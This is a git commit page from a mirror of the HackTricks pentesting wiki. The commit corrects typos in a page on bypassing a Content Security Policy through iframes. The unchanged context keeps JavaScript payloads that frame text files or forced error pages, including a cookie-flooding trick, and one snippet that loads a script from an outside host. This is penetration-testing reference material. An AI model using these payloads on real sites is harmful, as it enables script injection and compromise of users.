0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

Update csp-bypass-self-+-unsafe-inline-with-iframes.md

This commit is contained in:
Taleb Qasem 2022-10-10 10:21:43 +06:00 committed by GitHub
parent 0083ed7909
commit 450d0b4463
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
View File

@ -25,15 +25,15 @@ Content-Security-Policy: default-src self unsafe-inline;
Prohibits usage of any functions that execute code transmitted as a string. For example: `eval, setTimeout, setInterval` will all be blocked because of the setting `unsafe-eval`
Any content from external sources is also blocked, including images, css, websockets, and, especially, JS
Any content from external sources is also blocked, including images, CSS, WebSockets, and, especially, JS
## Via text & images
Modern browsers transform images and texts o HTML files to visualize them better (set background, center...).
Modern browsers transform images and texts into HTML files to visualize them better (set background, center, etc).
Therefore, if you **open an image or txt file** such as **favicon.ico** or **robots.txt** with an **`iframe`**, you will open it as HTML.
**These kind of pages usually doesn't have CSP headers and might not have X-Frame-Options**, so you can execute arbitrary JS from them:
**These kinds of pages usually don't have CSP headers and might not have X-Frame-Options**, so you can execute arbitrary JS from them:
```javascript
frame=document.createElement("iframe");
@ -46,7 +46,7 @@ window.frames[0].document.head.appendChild(script);
## Via Errors
Same as text files or images, **error responses usually doesn't have CSP headers and might not have X-Frame-Options**. So, you can force errors and load them inside an iframe:
Same as text files or images, **error responses usually don't have CSP headers and might not have X-Frame-Options**. So, you can force errors and load them inside an iframe:
```javascript
// Force nginx error
@ -69,7 +69,7 @@ for(var i=0;i<5;i++){document.cookie=i+"="}
```
```javascript
// After any of the previous examples, you can execute JS in the iframe wih something like:
// After any of the previous examples, you can execute JS in the iframe with something like:
script=document.createElement('script');
script.src='//bo0om.ru/csp.js';
window.frames[0].document.head.appendChild(script);